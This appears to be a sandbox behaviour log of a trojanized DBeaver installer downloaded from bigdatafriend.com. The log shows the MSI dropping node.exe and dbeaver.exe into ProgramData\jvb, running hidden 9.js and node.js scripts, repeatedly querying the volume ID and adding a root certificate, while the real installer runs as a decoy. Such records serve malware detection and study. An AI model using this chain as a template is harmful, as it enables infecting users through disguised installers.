Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://bigdatafriend.com/connect/dbeaver-ce-24.0.0-x86_64-setup.msi
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2040,i,12894160936135680563,1503628891557903779,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2040,i,12894160936135680563,1503628891557903779,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Downloads\dbeaver-ce-24.0.0-x86_64-setup.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\ProgramData\jvb\dbeaver.exe C:\ProgramData\jvb\dbeaver.exe
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe" "9.js
Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\jvb\node.exe "C:\ProgramData\jvb\node.exe" C:/ProgramData/jvb/node.js
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Downloads\dbeaver-ce-24.0.0-x86_64-setup.msi"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe" "9.js
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\ProgramData\jvb\dbeaver.exeFile written: C:\Users\user\AppData\Local\DBeaver\dbeaver.ini
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\ProgramData\jvb\dbeaver.exeWindow detected: < &BackI &AgreeCancelUniversal Database Manager Universal Database ManagerLicense AgreementPlease review the license terms before installing DBeaver Community.Press Page Down to see the rest of the agreement. Apache License Version 2.0 January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE REPRODUCTION AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use reproduction and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control are controlled by or are under common control with that entity. For the purposes of this definition "control" means (i) the power direct or indirect to cause the direction or management of such entity whether by contract or otherwise or (ii) ownership of fifty percent (50%) or more of the outstanding shares or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications including but not limited to software source code documentation source and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form including but not limited to compiled object code generated documentation and conversions to other media types. "Work" shall mean the work of authorship whether in Source or Object form made available under the License as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work whether in Source or Object form that is based on (or derived from) the Work and for which the editorial revisions annotations elaborations or other modifications represent as a whole an original work of authorship. For the purposes of this License Derivative Works shall not include works that remain separable from or merely link (or bind by name) to the interfaces of the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition "submitted" means any form of electronic verbal or written communication sent to the Licensor or its
Source: C:\ProgramData\jvb\dbeaver.exeWindow detected: < &BackI &AgreeCancelUniversal Database Manager Universal Database ManagerLicense AgreementPlease review the license terms before installing DBeaver Community.Press Page Down to see the rest of the agreement. Apache License Version 2.0 January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE REPRODUCTION AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use reproduction and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control are controlled by or are under common control with that entity. For the purposes of this definition "control" means (i) the power direct or indirect to cause the direction or management of such entity whether by contract or otherwise or (ii) ownership of fifty percent (50%) or more of the outstanding shares or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications including but not limited to software source code documentation source and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form including but not limited to compiled object code generated documentation and conversions to other media types. "Work" shall mean the work of authorship whether in Source or Object form made available under the License as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work whether in Source or Object form that is based on (or derived from) the Work and for which the editorial revisions annotations elaborations or other modifications represent as a whole an original work of authorship. For the purposes of this License Derivative Works shall not include works that remain separable from or merely link (or bind by name) to the interfaces of the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition "submitted" means any form of electronic verbal or written communication sent to the Licensor or its
Source: C:\ProgramData\jvb\dbeaver.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DBeaver
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\javaaccessbridge.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\net.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jli.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\sunmscapi.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jrunscript.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\verify.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\javaw.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\prefs.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\server\jvm.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\java.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jimage.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\plugins\com.sun.jna_5.13.0.v20230812-1000\com\sun\jna\win32-aarch64\jnidispatch.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\zip.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\management_ext.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\awt.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\dbeaver.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\ucrtbase.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\splashscreen.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\swt-awt-win32-4963r5.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\UserInfo.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\rmiregistry.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\w2k_lsa_auth.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\System.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\windowsaccessbridge-64.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\klist.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\jvb\node.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\WebView2Loader.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\swt-gdip-win32-4963r5.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\kinit.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\fontmanager.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\nio.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\dbeaver-cli.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jstack.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\ktab.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jmap.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jinfo.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\jvb\dbeaver.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\plugins\com.sun.jna_5.13.0.v20230812-1000\com\sun\jna\win32-x86-64\jnidispatch.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\keytool.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\vcruntime140_1.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\plugins\com.sun.jna_5.13.0.v20230812-1000\com\sun\jna\win32-x86\jnidispatch.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jps.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\msvcp140.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\vcruntime140.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\j2gss.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\UAC.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\javajpeg.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jsound.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jnicrypt64.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\sspi_bridge.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\swt-win32-4963r5.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\management.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jkiss_wmi.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jaas.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\freetype.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jcmd.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jabswitch.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\Uninstall.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\StartMenu.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\lcms.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\swt-wgl-win32-4963r5.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\LangDLL.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\attach.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jstat.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\mlib_image.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\j2pkcs11.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jawt.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\nsDialogs.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.2.800.v20231003-1442\eclipse_11802.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jaccesswalker.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\jaccessinspector.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\java.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\rmi.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\jvb\dbeaver.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\jvb\node.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\readme.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\plugins\org.jkiss.bundle.jfreechart_1.0.23\JFREECHART-LICENSE-LGPL.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\commons_license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\dbeaver_license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\gis-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\jsch-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\jsql-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\openai-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\poi-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\sshj-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\conf\security\policy\README.txt
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DBeaver Community
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DBeaver Community\Uninstall.lnk
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DBeaver Community\DBeaver.lnk
Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
